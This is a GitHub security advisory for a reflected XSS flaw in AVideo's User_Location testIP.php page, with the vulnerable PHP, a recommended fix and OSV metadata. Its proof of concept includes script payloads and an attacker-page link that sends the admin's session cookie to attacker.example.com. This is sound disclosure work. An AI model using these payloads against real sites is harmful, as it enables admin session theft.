GHSA-JQRJ-CHH6-8H78

Vulnerability from github – Published: 2026-04-01 21:08 – Updated: 2026-04-01 21:08
VLAI?
Summary
AVideo: Reflected XSS via Unescaped ip Parameter in User_Location testIP.php
Details

Summary

The User_Location plugin's testIP.php page reflects the ip request parameter directly into an HTML input element without applying htmlspecialchars() or any other output encoding. This allows an attacker to inject arbitrary HTML and JavaScript via a crafted URL. Although the page is restricted to admin users, AVideo's SameSite=None cookie configuration allows cross-origin exploitation, meaning an attacker can lure an admin to a malicious link that executes JavaScript in their authenticated session.

Details

At plugin/User_Location/testIP.php:16, the ip parameter is read from the request without sanitization:

$ip = $_REQUEST['ip'];

At line 34, the value is echoed directly into an HTML input element's value attribute:

<input type="text" name="ip" id="ip" class="form-control" value="<?php echo $ip; ?>">

No htmlspecialchars() is applied, allowing an attacker to break out of the value attribute and inject arbitrary HTML/JavaScript.

While the page requires admin authentication to access, AVideo sets session cookies with SameSite=None. When an admin clicks a link from an external site (email, chat, another website), their session cookie is sent with the request, and the XSS payload executes in the context of their authenticated admin session.

Proof of Concept

  1. Craft a URL with a payload that breaks out of the input value attribute:
https://your-avideo-instance.com/plugin/User_Location/testIP.php?ip="><script>alert(document.cookie)</script>
  1. URL-encoded version for embedding in links:
https://your-avideo-instance.com/plugin/User_Location/testIP.php?ip=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
  1. The resulting HTML rendered in the browser:
<input type="text" name="ip" id="ip" class="form-control" value=""><script>alert(document.cookie)</script>">
  1. To exploit via cross-origin link (leveraging SameSite=None), host the following on an attacker-controlled page:
<!-- attacker-page.html -->
<html>
<body>
<p>Click here to check your IP geolocation:</p>
<a href="https://your-avideo-instance.com/plugin/User_Location/testIP.php?ip=%22%3E%3Cscript%3Edocument.location=%27https://attacker.example.com/steal?c=%27%2Bdocument.cookie%3C/script%3E">
  Check IP Location
</a>
</body>
</html>
  1. When an admin clicks the link, their session cookie is sent (due to SameSite=None), and the JavaScript executes in their authenticated session.

Impact

An attacker can execute arbitrary JavaScript in the context of an admin user's session by sending them a crafted link. Because AVideo uses SameSite=None for session cookies, the attack works from any external website. Successful exploitation allows the attacker to steal the admin session cookie, create new admin accounts, modify site configuration, upload malicious plugins, or perform any other admin action.

  • CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)
  • Severity: Medium

Recommended Fix

Apply htmlspecialchars() when outputting the $ip variable at plugin/User_Location/testIP.php:34:

// plugin/User_Location/testIP.php:34
<input type="text" name="ip" id="ip" class="form-control" value="<?php echo htmlspecialchars($ip, ENT_QUOTES, 'UTF-8'); ?>">

Found by aisafe.io

Severity ?
6.1 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34739"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T21:08:14Z",
    "nvd_published_at": "2026-03-31T21:16:32Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe User_Location plugin\u0027s `testIP.php` page reflects the `ip` request parameter directly into an HTML input element without applying `htmlspecialchars()` or any other output encoding. This allows an attacker to inject arbitrary HTML and JavaScript via a crafted URL. Although the page is restricted to admin users, AVideo\u0027s `SameSite=None` cookie configuration allows cross-origin exploitation, meaning an attacker can lure an admin to a malicious link that executes JavaScript in their authenticated session.\n\n## Details\n\nAt `plugin/User_Location/testIP.php:16`, the `ip` parameter is read from the request without sanitization:\n\n```php\n$ip = $_REQUEST[\u0027ip\u0027];\n```\n\nAt line 34, the value is echoed directly into an HTML input element\u0027s `value` attribute:\n\n```php\n\u003cinput type=\"text\" name=\"ip\" id=\"ip\" class=\"form-control\" value=\"\u003c?php echo $ip; ?\u003e\"\u003e\n```\n\nNo `htmlspecialchars()` is applied, allowing an attacker to break out of the `value` attribute and inject arbitrary HTML/JavaScript.\n\nWhile the page requires admin authentication to access, AVideo sets session cookies with `SameSite=None`. When an admin clicks a link from an external site (email, chat, another website), their session cookie is sent with the request, and the XSS payload executes in the context of their authenticated admin session.\n\n## Proof of Concept\n\n1. Craft a URL with a payload that breaks out of the input value attribute:\n\n```\nhttps://your-avideo-instance.com/plugin/User_Location/testIP.php?ip=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n```\n\n2. URL-encoded version for embedding in links:\n\n```\nhttps://your-avideo-instance.com/plugin/User_Location/testIP.php?ip=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\n```\n\n3. The resulting HTML rendered in the browser:\n\n```html\n\u003cinput type=\"text\" name=\"ip\" id=\"ip\" class=\"form-control\" value=\"\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\"\u003e\n```\n\n4. To exploit via cross-origin link (leveraging SameSite=None), host the following on an attacker-controlled page:\n\n```html\n\u003c!-- attacker-page.html --\u003e\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cp\u003eClick here to check your IP geolocation:\u003c/p\u003e\n\u003ca href=\"https://your-avideo-instance.com/plugin/User_Location/testIP.php?ip=%22%3E%3Cscript%3Edocument.location=%27https://attacker.example.com/steal?c=%27%2Bdocument.cookie%3C/script%3E\"\u003e\n  Check IP Location\n\u003c/a\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n5. When an admin clicks the link, their session cookie is sent (due to `SameSite=None`), and the JavaScript executes in their authenticated session.\n\n## Impact\n\nAn attacker can execute arbitrary JavaScript in the context of an admin user\u0027s session by sending them a crafted link. Because AVideo uses `SameSite=None` for session cookies, the attack works from any external website. Successful exploitation allows the attacker to steal the admin session cookie, create new admin accounts, modify site configuration, upload malicious plugins, or perform any other admin action.\n\n- **CWE-79**: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)\n- **Severity**: Medium\n\n## Recommended Fix\n\nApply `htmlspecialchars()` when outputting the `$ip` variable at `plugin/User_Location/testIP.php:34`:\n\n```php\n// plugin/User_Location/testIP.php:34\n\u003cinput type=\"text\" name=\"ip\" id=\"ip\" class=\"form-control\" value=\"\u003c?php echo htmlspecialchars($ip, ENT_QUOTES, \u0027UTF-8\u0027); ?\u003e\"\u003e\n```\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-jqrj-chh6-8h78",
  "modified": "2026-04-01T21:08:14Z",
  "published": "2026-04-01T21:08:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-jqrj-chh6-8h78"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34739"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/31e6888e40be89cc2ab27d4cef449f6d8339ffb2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Reflected XSS via Unescaped ip Parameter in User_Location testIP.php"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.